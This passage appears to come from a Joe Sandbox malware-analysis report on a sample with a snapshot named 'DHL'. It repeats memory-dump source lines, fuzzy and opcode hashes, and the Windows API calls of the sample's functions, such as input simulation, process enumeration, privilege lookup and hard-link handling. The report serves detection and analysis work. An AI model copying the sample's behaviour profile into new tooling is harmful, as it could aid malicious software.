                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$socket
                                                        • String ID:
                                                        • API String ID: 1881357543-0
                                                        • Opcode ID: f8ae0ec94605e4923173e8952d363369cdbdc8780b9fb206f1d021487570f525
                                                        • Instruction ID: 6586e5f621468d118077859c3c06351ff38aa5cd86490fe14ccc1e41f46b4d7d
                                                        • Opcode Fuzzy Hash: f8ae0ec94605e4923173e8952d363369cdbdc8780b9fb206f1d021487570f525
                                                        • Instruction Fuzzy Hash: 8241B074600210AFE720AF24D886F6A77E5AB85718F548458F91A9F3D3E772ED428BD0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa00ff6118487f0e2d21d38d254a1f238b96919b4665741e4105f45fcbb0c3c9
                                                        • Instruction ID: f4f75795613d3803d7f4e58e09e77b047142313fa68715e845347d3e853df2e8
                                                        • Opcode Fuzzy Hash: aa00ff6118487f0e2d21d38d254a1f238b96919b4665741e4105f45fcbb0c3c9
                                                        • Instruction Fuzzy Hash: A741E275A80344EFE724DF38C841BAABBA9EBC8710F11852FF156DB792D771A9018790
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A15783
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00A157A9
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A157CE
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A157FA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 728158b55d94baaed9d9c22ef638c51ea473f026c0fdc2c16d769f42760c733c
                                                        • Instruction ID: 7e2634c32c66d188f1501ffcd347ac045d5de630a45164e645bc05b5ab3e22f1
                                                        • Opcode Fuzzy Hash: 728158b55d94baaed9d9c22ef638c51ea473f026c0fdc2c16d769f42760c733c
                                                        • Instruction Fuzzy Hash: B341DE35A00610DFCB11EF55C945A5EBBE2AF89720B198888F94A6B362CB34FD41DBD1
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009C6D71,00000000,00000000,009C82D9,?,009C82D9,?,00000001,009C6D71,8BE85006,00000001,009C82D9,009C82D9), ref: 009DD910
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009DD999
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009DD9AB
                                                        • __freea.LIBCMT ref: 009DD9B4
                                                          • Part of subcall function 009D3820: RtlAllocateHeap.NTDLL(00000000,?,00A71444,?,009BFDF5,?,?,009AA976,00000010,00A71440,009A13FC,?,009A13C6,?,009A1129), ref: 009D3852
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                        • String ID:
                                                        • API String ID: 2652629310-0
                                                        • Opcode ID: 8fe4d69ee5bdfc88cabd69787180d6ce39eb55e31cd76c1a1b2c3d2c9d907800
                                                        • Instruction ID: 1b57fe07809b53d784b693ea57b0e22363322d8ddad7c8aa1ca7c6dfe9e04ac0
                                                        • Opcode Fuzzy Hash: 8fe4d69ee5bdfc88cabd69787180d6ce39eb55e31cd76c1a1b2c3d2c9d907800
                                                        • Instruction Fuzzy Hash: 7B31F472A0220AABDF25CFA5DC91EAE7BA9EF40710F058169FC04D7250EB36DD50CB90
                                                        APIs
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00A35352
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A35375
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A35382
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A353A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$InvalidateMessageRectSend
                                                        • String ID:
                                                        • API String ID: 3340791633-0
                                                        • Opcode ID: 474560ceba9f62f58981c0bc85b56fbeb19116e6d6594c4178fc199e53779547
                                                        • Instruction ID: 6c13475179f74850d04ad5a65386909b42460b202a4a7f0ef91b081ad06a25c1
                                                        • Opcode Fuzzy Hash: 474560ceba9f62f58981c0bc85b56fbeb19116e6d6594c4178fc199e53779547
                                                        • Instruction Fuzzy Hash: 6631C434E95A08EFEB349B7CCC26BE877A5EB05390F584101FA109E1E1C7B49981EB41
                                                        APIs
                                                        • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00A0ABF1
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A0AC0D
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A0AC74
                                                        • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00A0ACC6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: d27b1975354786b47d076395a7a99410373be50005ea17d0a1aec5e565c50f36
                                                        • Instruction ID: 33707b71d978b0bd824aab8b399801f8cddbfcf22dacc7f88a26f3a37508fa4e
                                                        • Opcode Fuzzy Hash: d27b1975354786b47d076395a7a99410373be50005ea17d0a1aec5e565c50f36
                                                        • Instruction Fuzzy Hash: 0D312430A0471CAFFF35CBA4AC097FE7BB5ABA9320F05431AE485961D1C37489818792
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 00A3769A
                                                        • GetWindowRect.USER32(?,?), ref: 00A37710
                                                        • PtInRect.USER32(?,?,00A38B89), ref: 00A37720
                                                        • MessageBeep.USER32(00000000), ref: 00A3778C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: cf2d0b910d06085f9fa35703427753dd36e07dcaa68ebf4734a54800b5160a5d
                                                        • Instruction ID: 1b7c8f25038900c389b00826f0e0493244cb497825c539ac115a53e370163879
                                                        • Opcode Fuzzy Hash: cf2d0b910d06085f9fa35703427753dd36e07dcaa68ebf4734a54800b5160a5d
                                                        • Instruction Fuzzy Hash: 2C416DB4A05214EFCB21CF98CC95EADB7F5FB49314F1581A8F5159B261D730A942CF90
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00A316EB
                                                          • Part of subcall function 00A03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A03A57
                                                          • Part of subcall function 00A03A3D: GetCurrentThreadId.KERNEL32 ref: 00A03A5E
                                                          • Part of subcall function 00A03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A025B3), ref: 00A03A65
                                                        • GetCaretPos.USER32(?), ref: 00A316FF
                                                        • ClientToScreen.USER32(00000000,?), ref: 00A3174C
                                                        • GetForegroundWindow.USER32 ref: 00A31752
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 52004387f8b8df15981384a083d4aa5ba72e9da06044c9cccab9e656ea7a62fc
                                                        • Instruction ID: 730d72020f40287c48de1a8ffc73a1083d6c5157e8c334e1b59fc3c0a7fa4331
                                                        • Opcode Fuzzy Hash: 52004387f8b8df15981384a083d4aa5ba72e9da06044c9cccab9e656ea7a62fc
                                                        • Instruction Fuzzy Hash: 23313071E00149AFCB00DFA9C885DAEB7F9EF89304B5480A9F415E7211D6319E45CBA0
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A0D501
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00A0D50F
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00A0D52F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A0D5DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: 547bc06c1342164dd28f700fa2da4f09a02212561833efeb7113bf7e4358c9b1
                                                        • Instruction ID: 1fc6cdd7804aaf7fc8d2fb1d65846b5d8163bdb8352edcc59f430d41edac075c
                                                        • Opcode Fuzzy Hash: 547bc06c1342164dd28f700fa2da4f09a02212561833efeb7113bf7e4358c9b1
                                                        • Instruction Fuzzy Hash: 55317E721082049FD300EF94DC85BAFBBE8EFDA354F14092DF585961A1EB71A945CB92
                                                        APIs
                                                          • Part of subcall function 009B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009B9BB2
                                                        • GetCursorPos.USER32(?), ref: 00A39001
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009F7711,?,?,?,?,?), ref: 00A39016
                                                        • GetCursorPos.USER32(?), ref: 00A3905E
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009F7711,?,?,?), ref: 00A39094
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: ae9296355900fed63e339390fe0d2b338a1ab15b8d354226f4ff4c641707f715
                                                        • Instruction ID: cbd3d25ecb52b6a7d15cdcfc00e0022ef27fc21bd85aa446379ecb05bc80cef1
                                                        • Opcode Fuzzy Hash: ae9296355900fed63e339390fe0d2b338a1ab15b8d354226f4ff4c641707f715
                                                        • Instruction Fuzzy Hash: 8C21BF35600118EFCB29CFA8CC58EEB3BB9EB8A360F008055F90557261C3719991DB61
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00A3CB68), ref: 00A0D2FB
                                                        • GetLastError.KERNEL32 ref: 00A0D30A
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A0D319
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A3CB68), ref: 00A0D376
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: 6e3dda962ee39a52aedae99951c9e5984bd84a08271755c2db34c355025166e4
                                                        • Instruction ID: 7625de41dc26c9428f9176be610c8f5e3c72054a785d4a5260900e7f097053d6
                                                        • Opcode Fuzzy Hash: 6e3dda962ee39a52aedae99951c9e5984bd84a08271755c2db34c355025166e4
                                                        • Instruction Fuzzy Hash: 202191715043059FC700EFA8D8814AAB7E4BF96364F104A1DF499DB2E1E730D946CB93
                                                        APIs
                                                          • Part of subcall function 00A01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A0102A
                                                          • Part of subcall function 00A01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A01036
                                                          • Part of subcall function 00A01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A01045
                                                          • Part of subcall function 00A01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A0104C
                                                          • Part of subcall function 00A01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A01062
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A015BE
                                                        • _memcmp.LIBVCRUNTIME ref: 00A015E1
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A01617
                                                        • HeapFree.KERNEL32(00000000), ref: 00A0161E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 55c45cbf6e7d32a421d43b449fc08ad5fb0ab92e9d9f2cd0ecfa9866f61433af
                                                        • Instruction ID: 5ff9bf2dc93444a567b8654230e6ce75f5dd88e99c04a3fac5e29fa7a2ce0ee4
                                                        • Opcode Fuzzy Hash: 55c45cbf6e7d32a421d43b449fc08ad5fb0ab92e9d9f2cd0ecfa9866f61433af
                                                        • Instruction Fuzzy Hash: 6321AC32E00108EFDF14DFA4DD45BEEB7B8EF84354F084459E441AB281E731AA45DBA0
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00A3280A
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A32824
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A32832
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A32840
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: 1c0739266ced7309e5adf0cf466e473767d423c361b13a0af02654fa506b3cd8
                                                        • Instruction ID: 91d86e20637f1ac3a2384c419c13d79a53db9b9ec042a64e603bcd75ea8a077b
                                                        • Opcode Fuzzy Hash: 1c0739266ced7309e5adf0cf466e473767d423c361b13a0af02654fa506b3cd8
                                                        • Instruction Fuzzy Hash: D921AF31604611AFD714DB24CC55FAABBA5AF86324F148158F4268B6E2CB71FC82CBD0
                                                        APIs
                                                          • Part of subcall function 00A08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A0790A,?,000000FF,?,00A08754,00000000,?,0000001C,?,?), ref: 00A08D8C
                                                          • Part of subcall function 00A08D7D: lstrcpyW.KERNEL32(00000000,?,?,00A0790A,?,000000FF,?,00A08754,00000000,?,0000001C,?,?,00000000), ref: 00A08DB2
                                                          • Part of subcall function 00A08D7D: lstrcmpiW.KERNEL32(00000000,?,00A0790A,?,000000FF,?,00A08754,00000000,?,0000001C,?,?), ref: 00A08DE3
                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A08754,00000000,?,0000001C,?,?,00000000), ref: 00A07923
                                                        • lstrcpyW.KERNEL32(00000000,?,?,00A08754,00000000,?,0000001C,?,?,00000000), ref: 00A07949
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A08754,00000000,?,0000001C,?,?,00000000), ref: 00A07984
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: 64639398afe3135ee6329836de2f3267b42de6fc0f74e68076bfb0b34c1871a5
                                                        • Instruction ID: 8488a9db577268a4d200eeabd37e9d46f99bdf78c9840b38c73617d30874b843
                                                        • Opcode Fuzzy Hash: 64639398afe3135ee6329836de2f3267b42de6fc0f74e68076bfb0b34c1871a5
                                                        • Instruction Fuzzy Hash: D611D63A200245ABCB159F34EC45E7A77A5FF85390B50412AF946C72A4EB31D811D7A1
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A37D0B
                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A37D2A
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A37D42
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A1B7AD,00000000), ref: 00A37D6B
                                                          • Part of subcall function 009B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009B9BB2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID:
                                                        • API String ID: 847901565-0
                                                        • Opcode ID: 52d4f8b2bc5acc5f029ac2c9b46b7f78908d0bac8236577b99ac6bc1ce753860
                                                        • Instruction ID: f95f39209bc38e1ef09e6580b99f9c2cae4771144945138b8e6bab61428ac1ff
                                                        • Opcode Fuzzy Hash: 52d4f8b2bc5acc5f029ac2c9b46b7f78908d0bac8236577b99ac6bc1ce753860
                                                        • Instruction Fuzzy Hash: 5D11DF72214664AFCB20CF68CC04AAA3BA4AF453B0F118324F939D72F0D7308952DB40
                                                        APIs
                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00A356BB
                                                        • _wcslen.LIBCMT ref: 00A356CD
                                                        • _wcslen.LIBCMT ref: 00A356D8
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A35816
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_wcslen
                                                        • String ID:
                                                        • API String ID: 455545452-0
                                                        • Opcode ID: beaa2e694dabf683293f8b1d8e4a0e9c1f4bd9254c8676376c48285bb3046ac0
                                                        • Instruction ID: 7d6274ec0e2cabc3eef22bd26fe5ee54497469fb9e46587153a311b6e413c3a6
                                                        • Opcode Fuzzy Hash: beaa2e694dabf683293f8b1d8e4a0e9c1f4bd9254c8676376c48285bb3046ac0
